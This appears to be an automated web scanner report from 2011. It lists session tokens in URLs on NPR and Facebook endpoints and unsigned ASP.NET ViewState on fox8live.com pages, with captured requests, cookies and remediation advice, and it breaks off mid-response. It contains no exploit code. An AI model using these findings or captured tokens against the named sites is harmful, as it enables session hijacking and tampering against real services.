Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

7. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://login.npr.org/openid/embed

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type
...[SNIP]...

7.2. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28449eda%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b228a95%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df385454f24%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6a6a8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1acce1b18%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20c6a6a8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3597bd174&relation=parent&transport=postmessage&frame=f6312701c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.48
X-Cnection: close
Date: Mon, 09 May 2011 15:35:52 GMT
Content-Length: 0


7.3. http://www.npr.org/templates/reg/login.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.npr.org
Path:   /templates/reg/login.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /templates/reg/login.php HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:48 GMT
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 16829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Log in</title
...[SNIP]...
<div class="jrLogin">
<iframe src="http://login.npr.org/openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php" scrolling="no" frameBorder="no" allowtransparency="true" style="width:350px;height:240px"></iframe>
...[SNIP]...

8. ASP.NET ViewState without MAC enabled
There are 22 instances of this issue:

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


8.1. http://mobile.fox8live.com/BlackBerry/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /BlackBerry/default.aspx

Request

GET /BlackBerry/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:46 GMT
Content-Length: 4272


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzMjE1OTg0NzBkZA==" />
...[SNIP]...

8.2. http://mobile.fox8live.com/business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

Request

GET /business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:13 GMT
Content-Length: 6596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.3. http://mobile.fox8live.com/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:00 GMT
Content-Length: 5862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2NTE4MTM1MjNkZA==" />
...[SNIP]...

8.4. http://mobile.fox8live.com/news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request

GET /news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:05 GMT
Content-Length: 10811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.5. http://mobile.fox8live.com/news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

Request

GET /news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://mobile.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:17 GMT
Content-Length: 12654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.6. http://mobile.fox8live.com/sports/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /sports/default.aspx

Request

GET /sports/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:11 GMT
Content-Length: 5996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3ODc0MDQ4NTNkZA==" />
...[SNIP]...

8.7. http://mobile.fox8live.com/sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

Request

GET /sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:10 GMT
Content-Length: 9179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.8. http://mobile.fox8live.com/weather/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /weather/default.aspx

Request

GET /weather/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:07 GMT
Content-Length: 9343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NTk2NTQzOTEPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYEZg9kFgJmD2QWAmYPZBYCZg8PFgIeCEltYWdlVXJsBTkvbWVkaWEvZmlsZXMvY2N0dmlfd2VhdGhlci93dnVlL0V4dGVuZGVkX0ZvcmVjYXN0Lzk5OS5qcGdkZAIED2QWAmYPZBYCZg9kFgJmD2QWBAIGDw8WAh4PQ29tbWFuZEFyZ3VtZW50BQEwZGQCBw8PFgIfAQUBNmRkGAEFaGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRjdGwwMCRfJEZvcmVjYXN0DxQrAAJkZmQ=" />
...[SNIP]...

8.9. http://www.fox8live.com/business/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.10. http://www.fox8live.com/business/iframe_financialticker.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_financialticker.aspx

Request

GET /business/iframe_financialticker.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:02 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:39:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5216
Connection: keep-alive
Content-Length: 5216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUyNTdkZA==" />
...[SNIP]...

8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_indexwatch.aspx

Request

GET /business/iframe_indexwatch.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
